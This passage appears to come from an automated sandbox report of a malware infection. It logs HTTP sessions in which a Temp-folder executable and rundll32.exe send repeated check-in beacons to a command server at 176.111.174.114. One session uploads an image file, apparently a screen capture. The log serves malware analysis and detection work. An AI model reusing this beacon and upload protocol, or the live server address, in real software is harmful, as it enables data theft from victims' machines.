                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          141176.111.174.11480192.168.2.449820C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:32.536258936 CEST4830INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:32 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          142192.168.2.449821176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:33.193331957 CEST4831OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          143176.111.174.11480192.168.2.449821C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:33.290138006 CEST4831INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:33 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          144192.168.2.449822176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:33.744237900 CEST4832OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          145176.111.174.11480192.168.2.449822C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:33.850231886 CEST4832INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:33 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          146192.168.2.449823176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:35.128179073 CEST4833OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          147192.168.2.449824176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:35.161876917 CEST4847OUTPOST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227184
                                                                                                                                          Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2e a2 2b ea 3c b0 c7 b3 0a f2 1f 88 7f f0 49 df 12 c4 b2 5d fc 0b f8 c9 a4 eb a0 6e 31 e8 fe 27 87 fb 22 f1 cf 50 89 29 79 2d 58 01 c6 f9 26 87 24 7d d1 9e 2a 9e 3f 0f 3d f4 f5 26 b6 0e bc 76 57 f4 3e 45 a4 55 c6 45 76 df 16 7f 67 5f 8e 7f 01 ee a3 8b e2 ef c2 bd 6b 42 8a 79 0a 59 df de 59 37 d8 ef 08 19 fd c5 ca e6 19 c6 3b c6 ec 38 3c f1 5c 5b 6f ef 5d d1 94 65 0b a7 73 85 a9 45 d9 90 c7 1b d0 fd 3f 1a 96 9a f8 ee 29 72 15 cd 76 57 93 b5 44 e3 9f ad 4b 27 6a 6e dd dc 62 b1 94 4d e3 b9 4e 44 3e b5 1d 7e c7 f8 9b fe 0d 34 d5 7c 37 75 f6 7b ff 00 db 9f 74 2e d8 86 e5 3e 18 65 5f ff 00 2a 7c 1f 6f e6 39 aa d6 bf f0 6a 22 dc f5 fd bd f6 ff 00 dd 2d cf fe e5 2b f3 2a de 2b f0 05 29 b8 4f 19 66 bf e9 dd 6f fe 56 7d 64 38 4b 88 a5 1e 65 43 4f f1 43 ff 00 92 3f 1e a3 eb f8 54 be 53 fa 57 ec 8d b7 fc 1a 4e 2e 17 1f f0 f0 1d bc ff 00 d1 29 cf fe e5 6b f2 8b f6 87 f8 44 df b3 ff 00 ed 09 e3 df 80 8f af 8d 58 f8 27 c6 5a a6 80 75 51 6b e4 0b c3 67 77 2d bf 9d e5 ee 6f 2f 7f 97 bb 6e e6 db 9c 64 e3 35 ef 70 ff 00 19 70 df 13 d5 9d 3c b2 bf b4 94 12 6f dd 9c 6c 9e 9f 6a 31 fc 0f 3b 31 c9 73 3c ae 2a 58 aa 7c a9 e8 b5 8b fc 9b 38 a7 39 38 a1 36 7f 1d 39 d1 b3 9a 65 7d 49 e5 0e 65 fe e5 21 56 5e a2 92 9d bc d0 1b 11 f9 7e f4 2a f7 34 f7 eb 5f af bf f0 6e 6f fc 12 17 f6 1d ff 00 82 90 7e cd
                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x ?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 22:59:35.261070013 CEST4850OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 22:59:35.261148930 CEST4866OUTData Raw: a9 4b 76 b5 94 15 3e 9b 28 c5 7b b6 d6 2f 67 d0 fa 03 51 bf fd 90 bf 6a ef 86 7f 0c b4 ff 00 1b fe d0 f6 df 08 ff 00 e1 56 58 ea 1e 1c bd d1 3c 49 a0 6a fa a4 fa 9f 87 df 58 bc d4 ed 27 d3 0d 8d b5 c4 4f 7c a9 7d 71 04 90 dd cb 69 11 78 a0 61 3e
                                                                                                                                          Data Ascii: Kv>({/gQjVX<IjX'O|}qixa>$|y=|K^>a?i={i6A&4e"$x;[u|Dz58AYRUwvvJ8.JJ2m]KO_Oe'tc
                                                                                                                                          Apr 28, 2021 22:59:35.261265039 CEST4869OUTData Raw: 71 ff 00 09 d7 8d cf fd c9 13 7f f1 75 fc de 78 6b e1 1f c5 8f 18 fc 4d 1f 05 3c 1f f0 ab c4 9a af 8c cd fc f6 23 c2 3a 66 85 71 3e a8 6e a1 df e7 41 f6 44 43 37 98 9b 1f 72 6d dc bb 1b 20 60 d7 5f a0 7e c4 3f b6 af 8c 3c 6b af 7c 33 f0 97 ec 75
                                                                                                                                          Data Ascii: quxkM<#:fq>nADC7rm `_~?<k|3u[T'~?:?j 2[F@/`1UZ-jCcq:n!}uz7r~o:3>6x?823_:[oAIzm"I4bCE
                                                                                                                                          Apr 28, 2021 22:59:35.261482954 CEST4871OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 22:59:35.261637926 CEST4874OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u
                                                                                                                                          Apr 28, 2021 22:59:35.358671904 CEST4883OUTData Raw: cf e6 5e 9c f1 56 25 d3 a5 85 80 09 9c 74 15 ea 65 b9 46 2b 01 5a ac e7 3b a9 b6 d2 e8 9b 94 a4 ff 00 f4 a5 1d 2d a4 57 5b b7 e5 e3 b3 4c 2e 36 95 38 42 3a c5 5a ef 76 94 63 15 eb f0 f3 36 fe d4 a5 b2 b2 55 e9 b1 f7 a9 9a de 6e a5 29 16 37 cf dc
                                                                                                                                          Data Ascii: ^V%teF+Z;-W[L.68B:Zvc6Un)7[yTZ?Z>\rJTMt}^S.a?H*Ty;rAOXjjXB*~etrs]P7JY#o:`3"U&9/)<9/SRy^h#
                                                                                                                                          Apr 28, 2021 22:59:35.358719110 CEST4889OUTData Raw: ee 51 ac 64 45 72 eb 2c 48 01 2e ac 31 87 3d bd 39 a3 01 97 d6 cc 31 70 c3 d2 f8 a4 ec af a0 f1 f8 ea 19 6e 0e 78 aa df 04 15 dd b5 38 08 bf ad 39 3e f5 7d 4f ff 00 0c 3f f0 9f fe 86 1f 11 7f e0 5c 1f fc 66 81 fb 10 7c 28 5e 9e 20 f1 0f fe 05 c1
                                                                                                                                          Data Ascii: QdEr,H.1=91pnx89>}O?\f|(^ kq>3"O4|E}J?b?#c!?#R?>?e_>W;W_`kg_"M<7j>+9AqeIk(
                                                                                                                                          Apr 28, 2021 22:59:35.358908892 CEST4891OUTData Raw: 62 e1 7d 54 d7 e6 bf 51 f0 7b ea 4a b7 d6 71 3c f6 f8 3d de 6b f6 bf b3 e4 f9 f3 58 fd 2b eb de 30 fd 75 d1 fa b6 1b 91 3f 8f de e5 b7 7b 7b 5e 7f 97 2d cf 86 7f e0 af 5f b4 a7 c1 af da a7 f6 a6 b2 f8 95 f0 33 c5 6f ac e8 d0 f8 3e d2 c6 4b b7 d3
                                                                                                                                          Data Ascii: b}TQ{Jq<=kX+0u?{{^-_3o>K"tvN,ss_'m;(E{5xqNq_Wx"n+7d%#&1RWINNft]x?Xvb:)W^zjsKCjr
                                                                                                                                          Apr 28, 2021 22:59:35.359040976 CEST4902OUTData Raw: 27 6a 0a e6 64 6f 01 ef 55 de 10 4e 3a 55 ea 64 8a 0b 73 51 ca 5c 64 72 db b6 f3 9a fd 31 ff 00 83 51 ae c4 5f f0 53 ad 4d ca b1 1f f0 aa 35 8f 95 17 24 e2 e2 c8 e0 0e e7 8a fc ce af 69 fd 83 ff 00 6f 0f 8d bf f0 4e cf 8d 77 1f 1f 3e 00 d9 e8 53
                                                                                                                                          Data Ascii: 'jdoUN:UdsQ\dr1Q_SM5$ioNw>Sk390D"|P$a#:ppUaC3qOaM|)|_u+"mTyhXwr$)@%j]6+/oqo!G# 9o(?Ko
                                                                                                                                          Apr 28, 2021 22:59:35.359241009 CEST4910OUTData Raw: 9b 25 a6 ff 00 90 0a bc b6 f8 a5 f2 3d e8 f6 42 f6 cc cc 93 4b dd f2 54 32 68 e1 ba 25 6d 79 07 fb b4 e5 b4 ec 12 a7 d8 d2 1a c5 4e 27 35 36 89 c6 70 2a 9d c6 85 f2 1c 57 65 f6 1f fa 67 51 cb a5 ef 3f 72 b9 a5 81 84 8d a9 e6 12 89 e7 f7 5e 1f 73
                                                                                                                                          Data Ascii: %=BKT2h%myN'56p*WegQ?r^sqzMVu+W07lYz&^y9J~J\gDKBu-?Yueg`cn,|\Wox|wa^_=39i-?{V"Igb


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          148176.111.174.11480192.168.2.449823C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:35.231545925 CEST4847INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:35 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          149192.168.2.449826176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:35.440059900 CEST4935OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
